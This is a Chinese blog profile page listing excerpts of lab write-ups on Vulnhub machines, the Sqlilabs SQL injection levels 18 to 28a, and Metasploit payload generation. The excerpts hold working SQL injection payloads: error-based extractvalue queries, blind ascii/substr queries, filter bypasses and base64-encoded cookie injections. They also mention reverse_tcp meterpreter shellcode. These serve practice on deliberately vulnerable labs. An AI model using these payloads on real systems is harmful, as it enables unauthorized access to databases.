8 CrAcKeR-1

尚未进行身份认证

我要认证

伸手摘星,即使徒劳无功,亦不至满手污泥。

等级
TA的排名 2w+

Vulnhub-djinn3

与 1 和 2 相同,开机即可得到 djinn3 的 IP地址:192.168.67.14获取相关信息:nmap -A -p- 192.168.67.1422 ---> ssh --> open80 ---> http --> open5000 ---> http --> open31337 ---> open --> open探测 80 端口先看看刚刚 nmap 有没有扫出什么东西:可得到服务端是 lighttp.

2020-07-18 20:19:49

Vulnhub-djinn2

欢迎来到 djinn2 的世界,首先我们得对企业环境些许了解,否则你将无法顺畅地做该练习,在企业中一般都会有备份和邮箱,所以在该练习中,要注意备份和邮箱,一般放置的目录为 /var 目录,除此之外,作者还给我们一个小提示,就是在 5000 端口服务中有 RCE 存在,我们需要利用它,除此之外,介绍一下 MSF 中的 web_delivery 模块,它用于在我们有一定的访问权限,但是没有 shell 的情况下,让咋们开始吧:Dnmap -A -p- 192.168.67.33共开放了 5 个端口,2

2020-07-15 16:30:07

Sqlilabs-28a

28a 在这里????

2020-07-14 12:28:35

Sqlilabs-28

因为是 Winodws 那就盲注吧,这跟 26a27a 关卡一样, payload 改改就可以用了,这一关同样把报错信息给过滤了,所以报错注入用不了:–查表http://sqlilabs/Less-28/?id=1')and(if(ascii(substr((SeLect(table_name)from(SeLect(table_name),(table_rows)from(information_schema.tables)where(table_schema=database())and(tabl

2020-07-14 12:27:14

sqlilabs-27a

又是盲注,只需要把 26a 关卡 payload 改改就可以用了,这一关把报错信息给过滤了,所以报错注入用不了:–查表http://sqlilabs/Less-27a/?id=1"and(if(ascii(substr((SeLect(table_name)from(SeLect(table_name),(table_rows)from(information_schema.tables)where(table_schema=database())and(table_rows=14))a),1,1))

2020-07-14 12:26:32

Sqlilabs-27

题目告诉我们本关卡过滤了 union 和 select,其实还有空格,这一关也过滤了尝试双写绕过,不行那就大小写绕过,成功–查表http://sqlilabs/Less-27/?id=1'and(extractvalue(1,concat(0x7e,(SeLect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e)))and'1'='1–查列http://s.

2020-07-14 12:26:01

Sqlilabs-26

来到了 Sqlilabs 大魔王的第 26 关关卡…来到页面就看到大大的,“你的所有空格和过滤符都属于我们“,这难得到机智的你吗?在此说下常见的绕过方法有:(本来这应该在 25 关卡就说的,忘了…)双写绕过大小写绕过编码绕过,如:hex || URL注释符绕过,如:/!select/替换:如 and 可替换为 && ,or 可替换为 ||空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代有了上述的神兵利器,那就很

2020-07-14 12:25:32

Sqlilabs-25a

本关卡和 25 关的区别在于连单引号都省去了…http://sqlilabs/Less-25a/?id=1 报错http://sqlilabs/Less-25a/?id=1--+ 正常http://sqlilabs/Less-25a/?id=1 ordery by 3--+ 报错原因是 order 里面含有 or双写绕过:oorrderhttp://sqlilabs/Less-25a/?id=1 oorrder by 3--+ 正确http://sqlilabs/Less-2.

2020-07-14 12:25:00

Sqlilabs-25

这一关来到了 25 关一进入界面就看到大大的你的所有 ‘or’ 和 ‘and’ 都属于我们,这就需要我们绕过了…http://sqlilabs/Less-25/?id=1' 报错http://sqlilabs/Less-25/?id=1'--+ 正常http://sqlilabs/Less-25/?id=1' ordery by 3--+ 报错原因是 order 里面含有 or双写绕过:oorrderhttp://sqlilabs/Less-25/?id=1' oorrder

2020-07-14 12:24:30

Sqlilabs-24

这一关来到了二次注入的世界:所谓的二次注入简单一句话:就是你在一个身份下面可以改其它身份的密码(数据)不过在此之前想尝试一下报错注入在修改密码可不可以成功:???让我更聪明更努力点???ok,fine…那就二次注入吧…后台的修改密码的 SQL 语句如下:试想,如果在注册的时候,就写入一个带过滤后边 SQL 与的字符的用户名会怎么样呢?比如:admin’#SQL 语句就变成了:UPDATE users SET PASSWORD='$pass' where username= 'admi

2020-07-14 12:24:00

Sqlilabs-23

第 23 关对注入字符做了正则表达式的过滤,所以需要在引号上下功夫:http://sqlilabs/Less-23/?id=1' and '1知道了原理构造起来就很简单了:–查表http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),3 and '1' = '1简化:.

2020-07-14 12:23:31

vulnhub-djinn1

获取 IP 地址,目标机器已显示:获取信息:nmap -A -p- 192.168.67.108得到 4 个端口:21 --> FTP --> open --> 猜测有文件可获取22 --> SSH --> filtered --> 猜测为敲门服务[DC 有练过]1337 --> SOME --> open --> 使用 nc 连接7331 --> HTTP --> open --> 网页21 --> FTP

2020-07-14 12:21:01

Vulnhub-Basilic

灰常有意思的一次训练,需要对 python 沙箱逃逸有一定程度的理解,让我们开始游戏吧~[注:从源地址下载出得知需要拿到 4 个 flag]利用 namp 扫描获取目标 IP 地址:nmap -sn 192.168.67.1/24继续获取目标的相关开放端口等信息:namp -A -p- 192.168.67.18可以看到下列信息:http服务对应的端口是 5000 ,而不是 80,其次还开放了 22 --> ssh 服务,我们登陆到 web 页面游玩下~点击 contact me,得到

2020-07-10 12:34:31

Sqlilabs-22

这里来到了第一阶段的最后一关:22 关其实跟 21 关一样,只不过变成了双引号 " 而已,直接上菜吧o( ̄▽ ̄)ブuname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSM=uname=admin" and extractvalue(1,concat(0x7e,(select database()),0x7e))#怎么猜单引号加括号,这里当你构造好 payload pos

2020-07-09 16:51:54

Sqlilabs-21

来到了第 21 关,看着 21 关,我知道,第一阶段快结束了,马上要到…啪…给我认真写博文…这一关卡的题目给内容貌似一点都不符合…还是得从 cookie 下手,但肯定不跟20 关一样,通过提交正常的数据,我们可以看到,COOKIE 长的有点不太一样…Base64Decode 解码 YWRtaW4= 得到的结果是 admin,所以说后台将 COOKIE 进行了 Base64 的编码,所以构造 payload 时,应该在 cookie 类似于:[得先正确登入]uname=YWRtaW4nKSBhbm

2020-07-09 16:51:24

Sqlilabs-20

十大关一关卡,小试牛刀来到了第 20 关:本关还是在 HTTP HEADRE 做文章,具体为 COOKIE先输入正确的用户名和密码,进入界面看看:通过观察我们可以看到具体的 payload 该如何构造把 hackbar 的 cookie 栏调出来:–查表uname=admin' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=databas

2020-07-09 16:50:57

Sqlilabs-19

第 19 关跟第 18 关类似,User-Agent 改成了 Referer 改造注入–Referer“浏览器向 WEB 服务器表明自己是从哪个网页 /URL 获得/点击 当前请求中的网址/URL”同样的,这一关对 usernanme 和 password 都进行了 check_inputhackbar 制作针对 referer 的 payload:–查表1' and extractvalue(1,concat(0x7e,(select table_name from information_

2020-07-09 16:50:20

Sqlilabs-18

来到了 18 关18 关同样也是在 UPDATE 上面做手脚,但是限制更加严格,不仅对 username 对 password 也做了 check_input再看看后台 SQL 语句的构造:insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)

2020-07-09 16:49:50

Metasploit Framework —— Msfvenom

身份证msfvenom 是 msfpayload 爸爸和 msfencode 妈妈生的仔仔,是两个的结合体,继承了两者的优良品德,生日是 2015 年 6 月 8 日,刚过不久…用武之地免杀 : msfvenom 结合 excellent 编码器等生成的 payload 具有一定的免杀效果客户端渗透 : 在无法突破网络边界的情况下(IDS等)转而进行客户端的渗透,此法常见于社会工程学攻击,进而渗透到线上的业务网络,具体较常见的形式有:图片 邮件 PDF DOC WEB站点…诱骗人家下载执行 payl

2020-07-09 16:47:51

Metasploit Framework —— Payload

这里也是直接以练习为主,学习如何使用 payload:!!!附:在 exploit 的使用中,大部分时候是需要结合 payload 的,payload 也可以单独拿出来,生成 shellcode,这一节主要说的是生成 shellcode!!!这里我起初用的 payload 是 payload/windows/x64/meterpreter/reverse_tcp ,但是后面生成的 payload 无效果,所以我这里换了一个 payload payload/windows/meterpreter/re

2020-07-09 16:46:37

查看更多

勋章 我的勋章
  • 签到新秀
    签到新秀
    累计签到获取,不积跬步,无以至千里,继续坚持!
  • 阅读者勋章Lv2
    阅读者勋章Lv2
    授予在CSDN APP累计阅读博文达到7天的你,是你的坚持与努力,使你超越了昨天的自己。
  • 专栏达人
    专栏达人
    授予成功创建个人博客专栏的用户。专栏中添加五篇以上博文即可点亮!撰写博客专栏浓缩技术精华,专栏达人就是你!
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv4
    勤写标兵Lv4
    授予每个自然周发布9篇以上(包括9篇)原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。